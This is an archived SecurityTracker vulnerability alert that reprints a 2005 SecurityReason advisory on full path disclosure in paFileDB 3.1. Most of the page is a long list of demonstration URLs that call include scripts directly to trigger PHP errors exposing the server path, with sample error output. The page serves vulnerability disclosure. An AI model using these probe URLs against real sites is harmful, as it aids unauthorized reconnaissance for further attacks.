SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   paFileDB Vendors:   PHP Arena
paFIleDB Has Flaws in Multiple Files That Disclose the Installation Path to Remote Users
SecurityTracker Alert ID:  1013425
SecurityTracker URL:  http://securitytracker.com/id/1013425
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 14 2005
Impact:   Disclosure of system information
Exploit Included:  Yes  
Version(s): 3.1
Description:   sp3x of SecurityReason reported a vulnerability in paFileDB in many of the scripts. A remote user can determine the installation path.

A remote user can directly access a large number of include file scripts to cause the system to disclose the installation path. Some demonstration exploit URLs are provided:

http://[target]/[pafiledb_dir]/includes/team/auth.php?tuser=[something]
http://[target]/[pafiledb_dir]/includes/team/login.php?login=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add&add=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edit=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edit=form
http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order
http://[target]/[pafiledb_dir]/includes/team/file.php?file=add&add=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=form
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/login.php?login=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/auth.php?user=[something]
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/backupdb.php?admin[admin_status]=1
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/main.php
http://[target]/[pafiledb_dir]/includes/admin/restoredb.php
http://[target]/[pafiledb_dir]/includes/admin/settings.php
http://[target]/[pafiledb_dir]/includes/admin/options.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1
http://[target]/[pafiledb_dir]/includes/admin/team.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=add
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=delete
http://[target]/[pafiledb_dir]/includes/admin/license.php
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=add
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=delete
http://[target]/[pafiledb_dir]/includes/admin/custom.php
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add&edit=do
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=delete
http://[target]/[pafiledb_dir]/includes/admin/admins.php
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=add
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=add
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=order
http://[target]/[pafiledb_dir]/includes/admin/file.php
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=add
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete&delete=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete&delete=do&select=[something]
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order&order=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete&delete=do&select=
http://[target]/[pafiledb_dir]/includes/team/file.php?file=upload
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=upload
http://[target]/[pafiledb_dir]/includes/team/file.php?file=add

Impact:   A remote user can determine the installation path.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.phparena.net/pafiledb.php (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [SECURITYREASON.COM] Mass Full Path Disclosure in paFileDB




-=[ SecurityReason-2005-SRA#02 ]=-

-=[ Mass Full Path Disclosure in paFileDB ]=-

Author: sp3x
Date: 12 March 2005

Affected software :
===================
paFileDB version : =>3.1

Description :
=============

paFileDB is designed to allow webmasters have a database of files for download on their site. 
To add a download, all you do is upload the file using FTP or whatever method you use, log
into paFileDB's admin center, and fill out a form to add a file. paFileDB lets you edit and
delete the files too. 
No more messing with a bunch of HTML pages for a file database on your site! 
Using speedy MySQL for storing data, and powerful PHP for processing everything, paFileDB is
one of the best and easiest ways to manage files!

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can  lead to successful attack on the
website. If the attacker know Full path to script , he can start searching some more info on
others folders or about the server where the site is and  then try to break in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure. 

Examples :
----------

http://[target]/[pafiledb_dir]/includes/team/auth.php?tuser=[something]
http://[target]/[pafiledb_dir]/includes/team/login.php?login=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add
http://[target]/[pafiledb_dir]/includes/team/category.php?category=add&add=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edit=do
http://[target]/[pafiledb_dir]/includes/team/category.php?category=edit&edit=form
http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order
http://[target]/[pafiledb_dir]/includes/team/file.php?file=add&add=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=edit&edit=form
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/login.php?login=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/auth.php?user=[something]
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/backupdb.php?admin[admin_status]=1 - download file with error :]
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&edit=form
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=form

Error message :
---------------
=====================================
Fatal error: Call to a member function on a non-object in /path to site/pafiledb/includes/team/auth.php on line 18
=====================================

http://[target]/[pafiledb_dir]/includes/admin/main.php
http://[target]/[pafiledb_dir]/includes/admin/restoredb.php
http://[target]/[pafiledb_dir]/includes/admin/settings.php
http://[target]/[pafiledb_dir]/includes/admin/options.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1
http://[target]/[pafiledb_dir]/includes/admin/team.php
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=add
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/team.php?admin[admin_status]=1&teams=delete
http://[target]/[pafiledb_dir]/includes/admin/license.php
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=add
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/license.php?license=delete
http://[target]/[pafiledb_dir]/includes/admin/custom.php
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=edit
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=add&edit=do
http://[target]/[pafiledb_dir]/includes/admin/custom.php?custom=delete
http://[target]/[pafiledb_dir]/includes/admin/admins.php
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=add
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/admins.php?admin[admin_status]=1&admins=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=add
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=delete
http://[target]/[pafiledb_dir]/includes/admin/category.php?category=order
http://[target]/[pafiledb_dir]/includes/admin/file.php
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=add
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=edit&edit=do
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=delete&delete=do



Error message :
---------------
=====================================
Fatal error: Call to undefined function: adlocbar() in /path to site/pafiledb/includes/admin/main.php on line 12
=====================================


http://[target]/[pafiledb_dir]/includes/team/category.php?category=delete&delete=do&select=[something]
http://[target]/[pafiledb_dir]/includes/team/category.php?category=order&order=do
http://[target]/[pafiledb_dir]/includes/team/file.php?file=delete&delete=do&select=

Error message :
---------------
=====================================
Warning: Invalid argument supplied for foreach() in /path to site/pafiledb/includes/team/category.php on line 127
=====================================

http://[target]/[pafiledb_dir]/includes/team/file.php?file=upload
http://[target]/[pafiledb_dir]/includes/admin/file.php?file=upload

Error message :
---------------
=====================================
Fatal error: Call to undefined function: doublecheck() in /path to site/pafiledv/includes/team/file.php on line 32
=====================================

http://[target]/[pafiledb_dir]/includes/team/file.php?file=add

Error message :
---------------
=====================================
Warning: opendir(./images/posticons): failed to open dir: No such file or directory in /path to site/pafiledb/includes/team/file.php
 on line 106

Warning: readdir(): supplied argument is not a valid Directory resource in /path to site/pafiledb/includes/team/file.php on line 107

Fatal error: Call to a member function on a non-object in /path to site/pafiledb/includes/team/file.php on line 117
======================================

How to fix :
============

Download the new version of the script or update.

Vendor :
========

No respond


Greetz :
========

Special greetz : cXIb8O3 , pkw :)

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC